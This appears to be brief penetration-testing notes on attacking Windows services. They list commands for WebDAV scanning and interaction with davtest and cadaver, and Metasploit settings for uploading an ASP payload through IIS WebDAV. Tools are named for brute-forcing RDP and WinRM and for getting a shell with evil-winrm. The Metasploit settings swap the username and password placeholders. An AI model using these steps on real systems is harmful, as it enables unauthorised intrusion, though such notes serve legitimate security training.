Windows

Webdav

davtest

  • to scan the webdav..... type in the directory path to the tool :

davtest -url http://$IP/webdav -auth username:password

cadaver

  • to interact with the server (ie. to put,download, etc) files.

cadaver http://$IP/dir #dir = webdav directory 

metasploit

  • exploiting with msfconsole (automating davtest + cadaver)

exploit/windows/iis/iis_webdav_upload_asp 

#note if extension allowed is different this wont work
#only works if asp is executable on the server
# to check what extensions are executable ...... use davtest

set HttpPassword $username
set HttpUsername $password
set RHOSTS $IP
set PATH /webdav_dir/random_name.asp

psexec

RDP

  • what is rdp?

  • some tricks to pentest

msfconsole

  • to scan if a port is running rdp or not

hydra

  • bruteforce rdp

xfreerdp

  • connect to rdp port

Winrm

msfconsole

  • bruteforce winrm

evil-winrm

  • connect & get shell

Last updated